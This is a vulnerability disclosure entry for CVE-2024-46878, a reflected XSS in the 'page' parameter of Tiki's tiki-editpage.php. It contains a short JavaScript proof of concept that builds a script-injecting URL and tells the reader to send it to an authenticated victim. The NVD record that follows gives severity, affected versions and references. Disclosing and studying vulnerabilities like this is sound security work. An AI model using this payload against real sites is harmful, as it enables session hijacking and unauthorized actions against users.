CVE-2024-46878

// PoC for CVE-2024-46878 // The vulnerability is located in the 'page' parameter of tiki-editpage.php // Payload to demonstrate XSS execution var payload = '<script>alert(\'CVE-2024-46878-XSS\');</script>'; // Construct the malicious URL var targetUrl = 'http://target-domain/tiki-editpage.php?page=' + encodeURIComponent(payload); // Simulate sending the link to a victim (Social Engineering) console.log('Send this URL to an authenticated user: ' + targetUrl); // When the user clicks, the script executes in the context of the victim's browser session.

{"cve": {"id": "CVE-2024-46878", "sourceIdentifier": "[email protected]", "published": "2026-03-23T20:16:22.383", "lastModified": "2026-04-02T20:11:23.367", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Cross-Site Scripting (XSS) vulnerability exists in the page parameter of tiki-editpage.php in Tiki version 26.3 and earlier. This vulnerability allows attackers to execute arbitrary JavaScript code via a crafted payload, leading to potential access to sensitive information or unauthorized actions."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) existe en el parámetro 'page' de tiki-editpage.PHP en Tiki versión 26.3 y anteriores. Esta vulnerabilidad permite a los atacantes ejecutar código JavaScript arbitrario mediante una carga útil manipulada, lo que puede llevar a un acceso potencial a información sensible o acciones no autorizadas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*", "versionEndExcluding": "27.1", "matchCriteriaId": "827E97B6-4AE3-4807-8A3D-DDB9039B0ECE"}]}]}], "references": [{"url": "https://github.com/ColdFusionX/CVE-2024-46878-TikiCMS-XSS", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://tiki.org/article514-New-Security-Updates-Released-for-Tiki-27-x-LTS-26-x-and-24-x-LTS-and-Upgrade-is-Strongly-Recommended", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://tiki.org/tiki-newsletters.php?nlId=8&info=1", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ColdFusionX/CVE-2024-46878-TikiCMS-XSS", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}